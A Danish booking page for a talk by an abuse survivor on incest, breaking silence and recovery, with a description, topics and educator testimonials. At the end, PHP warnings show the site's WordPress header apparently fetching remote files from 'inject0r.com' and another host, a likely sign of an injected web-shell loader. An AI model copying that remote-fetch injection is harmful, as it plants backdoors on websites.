img-us
  • asc

    Foredragsholder Rasmus Skindbjerg Hinrichs

  • asc

    Emne Seksuelt misbrugt - Du er ikke din historie

  • asc

    pris 9000.-

Foredraget
Mit foredrag går i dybden med incest, pædofili og det at bryde den sociale arv i forhold til sin familie. Hvordan det ikke at sige noget har stor betydning på ens fremadrettet liv. Og hvordan en person kan bryde med tavsheden og komme til at være den der i kontrol over sit eget liv.

Hvordan en tryg og uskyldig barndom, kan ændres på et øjeblik?

Som dreng blev Rasmus udsat for et gentagen seksuelt misbrug af et mandligt familie medlem, og trods opvæksten i en meget tæt knyttet og kærlig familie - forblev overgrebene en hemmelighed langt ind i voksenlivet.

Rasmus fortæller hvordan familieværdierne kan gøre det svært at bryde den sociale arv, og gøre det svært at åbne munden og bryde ud af den rolle man er blevet tildelt i familien og om hvordan det selv at blive far, på et øjeblik ændrede alt.

Rasmus fortæller sin egen historie og deler sine erfaringer samt faglige viden, tilegnet gennem hans uddannelse til NLP rådgiver.

Emner der berøres.
- Incest/pædofili
- Bruddet med den sociale arv
- Selvmordstanker
- Vejen fra negative til positive løsninger
- Bruddet med tabuet incest

Om fordragsholderen
Rasmus Hinrichs er kommet ud stærkere, gladere og med en brændende passion for at bryde tabuet og hjælpe andre - Rasmus hjælper i dag familier med pædofili og incest tæt inde på livet, og har siden han selv brød med tavsheden for 6 år siden, valgt at uddanne sig inden for psykoterapien.

Rasmus arbejder med terapi og coaching af ofre og familier der står med lignende udfordringer, samt klienter med stress, depression, angst og øvrige personlige udfordringer.

Udtalelser: Kære Rasmus

Tak fordi du bryder tabuet. Din fortælling er stærk og du inspirerer mig, både med din fortælling men også din person.

Jeg er med dig hele vejen under dit oplæg i dag. Hvor du står planet med en sjælden ro og giver mig et unikt indblik i din indre rejse. Det berør mig og gør mig klogere.

Samtidig med at du, via din undervisning bryder et tabu, styrker du mine handleevner til at spotte og håndtere samtaler om overgreb.

Du har mine klare anbefaling og respekt. Keep up the good work. Så arbejder du med børn og unge, er der meget at tage med sig fra et oplæg med Rasmus, der med mod, ærlighed, nærvær og næstekærlighed bryder tabuet.

Rasmus kan også hjælpe dig, hvis du selv har brug for at bryde tabuet.

Dbh.
Rikke Burrild, memox Familiebehandleruddannelse

Foredrag om incest ved Rasmus Hinrichs

Tirsdag havde personalet og 3 pædagoger fra Åbenrå Friskole (vi havde inviteret al personale derfra – de er om nogen altid hjælpsomme, når vi beder dem om en hånd) til et aldeles fremragende, varmt, åbenhjertigt, ærligt, ordentligt og ikke mindst lærerigt foredrag ved Rasmus Hinrichs, som fortalte om incest. Han startede faktisk dagen med at fortælle om sine egne oplevelser derom for Ravneklassen. Der hersker ingen tvivl om, at hans fortælling gav stof til eftertanke hos hver og en. Vi voksne føler os nu klædt meget bedre på til både at observere og evt. Agere på hensigtsmæssige måder.

Kæmpe stor tak til Rasmus, som er i gang med at gøre sine altødelæggende erfaringer til sin levevej. Han giver desuden håb – man kan ved mod, kærlighed og hårdt arbejde og meget mere faktisk godt få et godt og velfungerende liv med familie og børn osv.

Rasmus er i gang med at uddanne sig til psykoterapeut og holder gerne foredrag. Det er et mere end vigtigt tema, som er alt for tabubelagt. Vi herfra kan hver og en kun varmt anbefale ham, hvis nogen derude har brug for viden herom.

Anne Søndergård, Skole leder

Kære Rasmus

Dit oplæg idag satte så mange følelser igang hos mig. Din personlige fortælling du kom med idag på familiebehandleruddannelse i Memox er så vigtigt et emne alle fagpersoner, der arbejder inden for det socialfaglige område bør kende mere til og vide hvordan vi tackler, således vi bedst muligt ser dem, der har brugt for at blive set!

Din måde at dele din historie på med din nærvær, ro humor og viden er en kæmpe inspiration. Som socialfaglig koordinator i Memox, har jeg dagligt berøring med arbejdet med socialt udsatte børn/unge og familier der har brug for støtte. TAK for din inspiration, din historie vil jeg tage med mig i min hverdag og det vil helst sikker gøre en forskel i mit arbejde og dermed også for de børn og unge der har brug for det.

Josefina Makris, Socialfaglig koordinator Memox


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Razan Haugaard

Patrick Iversen Larsen

Simon Steenholm

Ahmet Aksoy


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22